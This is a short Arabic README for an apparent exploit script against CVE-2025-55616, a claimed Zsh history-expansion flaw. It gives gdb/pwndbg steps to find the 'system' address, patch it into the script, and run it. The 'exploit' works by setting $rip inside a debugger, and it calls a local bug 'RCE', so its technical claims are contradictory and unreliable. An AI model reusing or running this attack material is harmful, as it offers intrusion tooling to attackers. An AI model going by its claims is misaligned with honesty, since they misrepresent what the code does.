
استغلال لـ CVE-2025-55616، ثغرة تنفيذ أوامر محلية (RCE) في Zsh عبر تعبير السجل، مما يحقق تنفيذ كود تعسفي بصلاحيات المستخدم.
لتشغيل هذا الاستغلال: فقط قم بتغيير عنوان الـ ip و "p system" في الاستغلال، لأنني جربت هذا أيضًا على حاسوبي المحمول الثاني، ولتغييره قم بتشغيل الأمر التالي في gdb (خاصة في pwndbg):
$ gdb zsh -f (في الطرفية)
pwndbg> run -f
username% ! (username سيكون اسمك فقط اكتب ! )
username% !!11111111111 (نفس الشيء هنا فقط اكتب !!11111111111 )
pwndbg> p system
بعد الحصول على عنوان "p system" فقط قم بتغييره في
b'set $rip = 0x7ffff7cc9110', (استخدم عنوان p system الخاص بك بدلاً من 0x7ffff7cc9110
تسمح هذه الثغرة للمهاجمين المحليين بتحقيق تنفيذ أوامر عشوائي (RCE) بصلاحيات المستخدم الذي يقوم بتشغيل عملية Zsh.
python3 CVE-2025-55616.py